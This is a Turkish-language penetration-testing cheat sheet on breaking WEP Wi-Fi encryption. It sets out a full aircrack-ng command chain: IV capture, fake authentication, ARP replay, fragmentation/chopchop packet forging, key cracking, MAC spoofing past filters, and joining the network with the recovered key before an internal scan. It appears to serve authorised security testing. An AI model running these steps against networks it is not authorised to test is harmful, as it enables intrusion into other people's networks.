WEP Kırma
WEP eski / zayıf
WEP eski / zayıf
WEP (Wired Equivalent Privacy), RC4’ü zayıf ve kısa IV (initialization vector) ile kullandığından tasarımsal olarak kırıktır. Yeterli sayıda IV toplandığında anahtar, parolanın gücünden bağımsız olarak istatistiksel saldırıyla kurtarılır. Günümüzde nadir görülse de eski cihaz, endüstriyel ve IoT ağlarında hâlâ karşılaşılır — bulgu tek başına kritiktir.
Neden kırılır (özet)
Section titled “Neden kırılır (özet)”IV 24-bit → tekrarlar kaçınılmazZayıf IV + RC4 keystream sızıntısı → FMS / PTW istatistiksel saldırıARP replay → aynı keystream ile trafik çoğaltma → IV hızla birikirAnahtar uzunluğu (64/128-bit) pratikte engel değil; IV sayısı kritikÖn koşullar
Section titled “Ön koşullar”- Monitor + injection (aireplay-ng -9)- Hedef ENC=WEP (airodump)- Mümkünse ilişkili istemci (ARP üretimi kolaylaşır)- aircrack-ng suitesudo airodump-ng wlan0monAnahtar kurtarma (klasik PTW)
Section titled “Anahtar kurtarma (klasik PTW)”-
IV topla — hedef AP’yi dinleyerek #Data sütununu büyüt:
Terminal window sudo iw dev wlan0mon set channel 6Terminal window sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w wep wlan0mon -
Sahte authentication (gerekirse) — bazı AP’ler ilişkili olmayan istemciden replay kabul etmez:
Terminal window sudo aireplay-ng -1 0 -e "OldWifi" -a AA:BB:CC:DD:EE:FF \-h YOUR_MAC wlan0mon -
ARP replay ile trafiği hızlandır :
Terminal window sudo aireplay-ng -3 -b AA:BB:CC:DD:EE:FF -h YOUR_MAC wlan0monTerminal window sudo aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF \-b AA:BB:CC:DD:EE:FF -h YOUR_MAC wlan0mon -
Anahtarı kır — genelde ~20k–80k IV (PTW); eski FMS daha fazla ister:
Terminal window aircrack-ng -b AA:BB:CC:DD:EE:FF wep-01.capTerminal window aircrack-ng -z wep-01.cap
#Data ~5000–20000 civarında aircrack-ng denemeye başlanabilir; başarı oranı IV kalitesine göre artar.
Fragmentation / chopchop (ARP yokken)
Section titled “Fragmentation / chopchop (ARP yokken)”İstemci veya doğal ARP yoksa keystream elde edip sahte paket enjekte edilir:
sudo aireplay-ng -5 -b AA:BB:CC:DD:EE:FF -h YOUR_MAC wlan0monsudo aireplay-ng -4 -b AA:BB:CC:DD:EE:FF -h YOUR_MAC wlan0monpacketforge-ng -0 -a AA:BB:CC:DD:EE:FF -h YOUR_MAC \ -k 255.255.255.255 -l 255.255.255.255 -y fragment-XXXX.xor -w arp.capsudo aireplay-ng -2 -r arp.cap wlan0monClient ile doğal trafik
Section titled “Client ile doğal trafik”sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w wep wlan0monwatch -n 30 'aircrack-ng wep-01.cap'Kırılan anahtarla bağlanma
Section titled “Kırılan anahtarla bağlanma”sudo iwconfig wlan0 essid "OldWifi" key XX:XX:XX:XX:XXsudo nmcli connection add type wifi ifname wlan0 con-name wep-old \ ssid "OldWifi" wifi-sec.key-mgmt none wifi-sec.wep-key0 XXXXXSonrasında iç ağ taraması: scanning.
SKA (Shared Key Authentication)
Section titled “SKA (Shared Key Authentication)”Nadir Shared Key Auth’da authentication challenge yakalanıp keystream çıkarılabilir:
sudo aireplay-ng -1 0 -a AA:BB:CC:DD:EE:FF -h YOUR_MAC wlan0monBaşarısızlık durumları
Section titled “Başarısızlık durumları”Injection başarısız → sürücü/adaptör; -9 testiFake auth rejected → MAC filter; başka MAC dene / client MAC spoofIV birikmiyor → fragmentation/chopchopaircrack KEY NOT FOUND → daha fazla IV; doğru BSSID filtresi (-b)WEP40 vs WEP104 → aircrack genelde ikisini denersudo ip link set wlan0mon downsudo macchanger -m CC:DD:EE:FF:00:11 wlan0monsudo ip link set wlan0mon upKomut üreteci
Section titled “Komut üreteci”aircrack · WEP
embedded toolaircrack-ng wep-01.capaircrack · WEP
Section titled “aircrack · WEP”Saldırı zinciri
Section titled “Saldırı zinciri”airodump ENC=WEP → kanal kilit → fake auth → ARP replay → #Data ↑ → aircrack-ng → WEP key → ağa katıl → iç pentestARP yok → fragmentation → packetforge ARP → replay → crack